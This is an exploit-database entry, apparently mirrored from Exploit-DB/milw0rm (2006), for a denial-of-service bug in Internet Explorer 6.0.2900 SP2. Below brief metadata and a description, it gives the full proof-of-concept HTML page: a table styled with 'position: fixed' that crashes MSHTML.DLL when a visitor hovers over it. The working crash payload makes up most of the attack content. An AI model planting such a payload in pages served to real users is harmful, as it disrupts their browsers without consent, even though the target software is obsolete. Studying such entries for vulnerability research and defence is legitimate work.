IE-Crash - By seven - exploit.company

vendor:

Internet Explorer

by:

seven

8,8

CVSS

HIGH

DoS vulnerability

N/A

CWE

Product Name: Internet Explorer

Affected Version From: Internet Explorer <= 6.0.2900 SP2

Affected Version To: Internet Explorer <= 6.0.2900 SP2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

IE-Crash – By seven

Internet Explorer suffers from a DoS vulnerability in which a remote user's Internet Explorer session can be crashed when hovering their cursor over a specially made table. The fault occurs when the 'position' CSS attribute is set to a table, resulting in an 'unhandled exception in iexplorer.exe(MSHTML.DLL)'.

Mitigation:

N/A

Source

Exploit-DB raw data:

<!--
# Internet Explorer <= 6.0.2900 SP2
#
# suffers from a DoS vulnerability in which a remote users
# Internet Explorer session can be crashed when hovering
# their cursor over a specially made table. The fault occurs
# when the "position" CSS attribute is set to a table.
# This results in an 'unhandled exception in iexplorer.exe(MSHTML.DLL)'
#
# $uid-seven
#
# shout outs to cijfer
-->

<html>
<head>
</style>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>IE-Crash - By seven</title>
<style type="text/css">

#header{
position: fixed;
height: 761px;
width: 1268;
}
</style>
</head>
<body>
<table border="2" cellpadding="0" cellspacing="0" width="797" height="343" align="center">

    <tr>

    <td id="header" valign="top">

        </td>
<td valign="top">

        </td>
</table>

# milw0rm.com [2006-05-10]